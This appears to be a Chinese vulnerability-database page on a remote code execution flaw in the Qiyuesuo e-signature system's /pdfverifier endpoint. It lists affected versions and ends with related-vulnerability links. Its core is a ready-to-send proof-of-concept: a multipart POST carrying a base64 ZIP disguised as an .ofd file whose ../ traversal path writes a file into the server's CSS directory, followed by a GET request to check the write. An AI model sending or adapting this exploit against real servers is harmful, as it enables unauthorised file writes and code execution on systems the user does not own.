契约锁-电子签章系统 pdfverifier 远程代码执行漏洞

日期: 2025-07-10 21:46:02 | 影响软件: 契约锁电子签章系统 | POC: 已公开

漏洞描述

2025年07月07日，契约锁发布安全补丁修复了远程代码执行漏洞。该漏洞允许未授权攻击者通过特定方式在服务器上执行任意代码。由于该漏洞利用难度较低，建议相关用户及时更新安全补丁进行修复。影响版本： 4.3.8 <= 契约锁 <= 5.x.x && 补丁版本 < 2.1.8 4.0.x <= 契约锁 <= 4.3.7 && 补丁版本 < 1.3.8

PoC代码

POST /pdfverifier HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=f11cab403f27e81fb32bf82855f49809

--f11cab403f27e81fb32bf82855f49809
Content-Disposition: form-data; name="file"; filename="f11cab403f27e81fb32bf82855f49809.ofd"

{{base64dec(UEsDBBQAAAAAADlh71rkMY9XMgAAADIAAACWAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vb3B0L3FpeXVlc3VvL3Jlc291cmNlcy9jc3MvOGI2NWJjMDg4MDAyM2RjNTJhNTUuY3NzaHR0cHM6Ly93d3cucWl5dWVzdW8uY29tL21vcmUvc2VjdXJpdHkvc2VydmljZXBhY2tQSwECFAMUAAAAAAA5Ye9a5DGPVzIAAAAyAAAAlgAAAAAAAAAAAAAAgAEAAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vb3B0L3FpeXVlc3VvL3Jlc291cmNlcy9jc3MvOGI2NWJjMDg4MDAyM2RjNTJhNTUuY3NzUEsFBgAAAAABAAEAxAAAAOYAAAAAAA==)}}
--f11cab403f27e81fb32bf82855f49809--

GET /qyswebapp/assets/css/8b65bc0880023dc52a55.css HTTP/1.1

漏洞描述

PoC代码

相关漏洞推荐

契约锁-电子签章系统存在任意文件读取漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

契约锁-电子签章系统存在任意文件读取漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC